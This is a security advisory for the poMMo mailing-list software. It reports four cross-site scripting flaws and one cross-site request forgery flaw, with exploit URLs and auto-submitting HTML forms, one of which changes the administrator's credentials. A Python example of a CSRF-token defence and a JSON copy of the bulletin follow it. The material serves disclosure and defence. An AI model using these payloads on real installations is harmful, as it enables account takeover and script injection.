High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in poMMo which could be exploited to perform cross-site scripting and cross-site request forgery attacks.
1) Cross-site scripting (XSS) vulnerabilities in poMMo
1.1 The vulnerability exists due to insufficient sanitization of the "referer" parameter in index.php. A remote attacker can trick a user into opening a specially crafted URL and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
http://host/index.php?referer=1"><script>alert(document.cookie)</script>
1.2 The vulnerability exists due to insufficient sanitization of the "site_name" parameter in admin/setup/config/general.php. A remote attacker can trick a logged-in administrator into submitting a specially crafted HTTP request (for example through an auto-submitting form on an attacker-controlled page) and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged into the application and has access to the administrative interface.
Exploitation example:
<form action="http://host/admin/setup/config/general.php" method="post" name="main">
<input type="hidden" name="list_name" value="Mailing List">
<input type="hidden" name="site_name" value='poMMo"><script>alert(document.cookie)</script>'>
<input type="hidden" name="site_name" value="poMMo Website">
<input type="hidden" name="site_url" value="http://www.example.com/">
<input type="hidden" name="site_success" value="">
<input type="hidden" name="site_confirm" value="">
<input type="hidden" name="list_confirm" value="on">
<input type="hidden" name="list_exchanger" value="mail">
</form>
<script>
document.main.submit();
</script>
1.3 The vulnerability exists due to insufficient sanitization of the "group_name" parameter in admin/subscribers/subscribers_groups.php. A remote attacker can trick a logged-in administrator into submitting a specially crafted HTTP request (for example through an auto-submitting form on an attacker-controlled page) and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged into the application and has access to the administrative interface.
Exploitation example:
<form action="http://host/admin/subscribers/subscribers_groups.php" method="post" name="main">
<input type="hidden" name="group_name" value='group"><script>alert("XSS")</script>'>
</form>
<script>
document.main.submit();
</script>
1.4 The vulnerability exists due to insufficient sanitization of the "field_name" parameter in admin/setup/setup_fields.php. A remote attacker can trick a logged-in administrator into submitting a specially crafted HTTP request (for example through an auto-submitting form on an attacker-controlled page) and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged into the application and has access to the administrative interface.
Exploitation example:
<form action="http://host/admin/setup/setup_fields.php" method="post" name="main">
<input type="hidden" name="field_name" value='1"><script>alert(document.cookie)</script>'>
<input type="hidden" name="field_type" value="text">
</form>
<script>
document.main.submit();
</script>
2) Cross-site request forgery (CSRF) in poMMo
The vulnerability exists because admin/setup/config/users.php does not verify that a request originates from its own interface (the form carries no anti-CSRF token and the request origin is not checked). A remote attacker can create a specially crafted web page, trick a logged-in administrator into visiting it, and change the administrator's username, password and e-mail address.
Exploitation example:
<form action="http://host/admin/setup/config/users.php" method="post" name="main">
<input type="hidden" name="admin_username" value="admin2">
<input type="hidden" name="admin_password" value="newpass">
<input type="hidden" name="admin_password2" value="newpass">
<input type="hidden" name="admin_email" value="email@example.com">
</form>
<script>
document.main.submit();
</script>
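The following Python code is an added example of the defence the affected handler lacks; it is not poMMo's code and not part of the original advisory. It implements a per-session anti-CSRF token (an HMAC over the session id) together with an Origin/Referer check, and runs the advisory's forged form through it: the browser attaches the administrator's session cookie, but the form carries no token and arrives with the attacker's origin, so it is rejected, while the same fields submitted from the real admin page with the token are accepted. The site origin, server secret, session ids and sample requests are assumptions.

```python
"""Synchronizer-token CSRF check for a credential-change handler such as
admin/setup/config/users.php.

Added example: not poMMo's code and not part of the original advisory.
Assumed: the site origin, the per-deployment secret, the session ids and
the two sample requests (the forged one is the advisory's form as the
server sees it: session cookie attached by the browser, no token).
"""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://host"  # assumed origin of the poMMo install
SERVER_SECRET = secrets.token_bytes(32)  # per-deployment secret; persist it in practice


def csrf_token(session_id, secret=SERVER_SECRET):
    """Derive the token to embed as a hidden field in every admin form of this session."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers):
    """Cheap first check: the browser-set Origin (or Referer) must be our own site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when neither header is present
    parts = urlsplit(source)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def validate_change(session_id, form, headers, secret=SERVER_SECRET):
    """Decide whether a credential-change POST may proceed. Returns (accepted, reason)."""
    if not origin_allowed(headers):
        return False, "cross-site origin"
    expected = csrf_token(session_id, secret).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(expected, supplied):  # constant-time comparison
        return False, "missing or invalid csrf_token"
    if form.get("admin_password") != form.get("admin_password2"):
        return False, "password mismatch"
    return True, "ok"


# Constructed sample requests.
SESSION = "sess-" + secrets.token_hex(8)

FORGED_FORM = {  # the advisory's hidden fields; no csrf_token
    "admin_username": "admin2", "admin_password": "newpass",
    "admin_password2": "newpass", "admin_email": "email@example.com",
}
FORGED_HEADERS = {"Origin": "http://attacker.example",
                  "Referer": "http://attacker.example/lure.html"}
LEGIT_HEADERS = {"Origin": SITE_ORIGIN,
                 "Referer": SITE_ORIGIN + "/admin/setup/config/users.php"}


def legit_form(session_id=SESSION):
    """The same fields as the forged form, plus the token the real page would carry."""
    return dict(FORGED_FORM, csrf_token=csrf_token(session_id))


def demo():
    """Run the four cases a reviewer would want to see."""
    return {
        "forged_cross_site": validate_change(SESSION, FORGED_FORM, FORGED_HEADERS),
        "same_origin_no_token": validate_change(SESSION, FORGED_FORM, LEGIT_HEADERS),
        "legitimate": validate_change(SESSION, legit_form(), LEGIT_HEADERS),
        "token_from_other_session": validate_change(
            SESSION, legit_form("sess-other"), LEGIT_HEADERS),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The token check is the one that decides; the origin check only gives an early, cheap rejection, because some clients and proxies strip Referer and older browsers do not send Origin at all. For a PHP application the equivalent is storing the token in $_SESSION, emitting it as a hidden field on the admin forms, and comparing it with hash_equals() before any state change.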
{"id": "HTB22976", "type": "htbridge", "bulletinFamily": "software", "title": "Multiple Vulnerabilities in poMMo", "description": "High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in poMMo which could be exploited to perform cross-site scripting and cross-site request forgery attacks. \n \n1) Cross-site scripting (XSS) vulnerabilities in poMMo \n1.1 The vulnerability exists due to input sanitation error in the \"referer\" parameter in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. \nExploitation example: \nhttp://host/index.php?referer=1\"><script>alert(document.cookie)</script> \n1.2 The vulnerability exists due to input sanitation error in the \"site_name\" parameter in admin/setup/config/general.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. 
\nExploitation example: \n<form action=\"http://host/admin/setup/config/general.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"list_name\" value=\"Mailing List\"> \n<input type=\"hidden\" name=\"site_name\" value='poMMo\"><script>alert(document.cookie)</script>'> \n<input type=\"hidden\" name=\"site_name\" value=\"poMMo Website\"> \n<input type=\"hidden\" name=\"site_url\" value=\"http://www.example.com/\"> \n<input type=\"hidden\" name=\"site_success\" value=\"\"> \n<input type=\"hidden\" name=\"site_confirm\" value=\"\"> \n<input type=\"hidden\" name=\"list_confirm\" value=\"on\"> \n<input type=\"hidden\" name=\"list_exchanger\" value=\"mail\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n1.3 The vulnerability exists due to input sanitation error in the \"group_name\" parameter in admin/subscribers/subscribers_groups.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. \nExploitation example: \n<form action=\"http://host/admin/subscribers/subscribers_groups.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"group_name\" value='group\"><script>alert(\"XSS\")</script>'> \n</form> \n<script> \ndocument.m ain.submit(); \n</script> \n1.4 The vulnerability exists due to input sanitation error in the \"field_name\" parameter in admin/setup/setup_fields.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. 
\nExploitation example: \n<form action=\"http://host/admin/setup/setup_fields.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"field_name\" value='1\"><script>alert(document.cookie)</script>'> \n<input type=\"hidden\" name=\"field_type\" value=\"text\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n2) Cross-site request forgery (CSRF) in poMMo \nThe vulnerability exists due to insufficient validation of the request origin in admin/setup/config/users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change administrator`s credentials. \nExploitation example: \n<form action=\"http://host/admin/setup/config/users.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"admin_username\" value=\"admin2\"> \n<input type=\"hidden\" name=\"admin_password\" value=\"newpass\"> \n<input type=\"hidden\" name=\"admin_password2\" value=\"newpass\"> \n<input type=\"hidden\" name=\"admin_email\" value=\"email@example.com\"> \n</form> \n<script> \ndocument.main.submit(); \n</sc ript> \n\n", "published": "2011-04-26T00:00:00", "modified": "2011-04-26T00:00:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P/"}, "href": "https://www.htbridge.com/advisory/HTB22976", "reporter": "High-Tech Bridge", "references": [], "cvelist": [], "lastseen": "2020-12-24T11:31:50", "viewCount": 22, "enchantments": {"score": {"value": 1.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-5299", "CVE-2011-5300"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101282"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26329"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-5299", "CVE-2011-5300"]}]}, "exploitation": null, "vulnersScore": 1.9}, "affectedSoftware": [{"version": "PR16.1", "operator": "le", "name": "pommo"}], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": 
{"dependencies": 1645441341, "score": 1659770509, "affected_software_major_version": 1666691171, "epss": 1678825578}}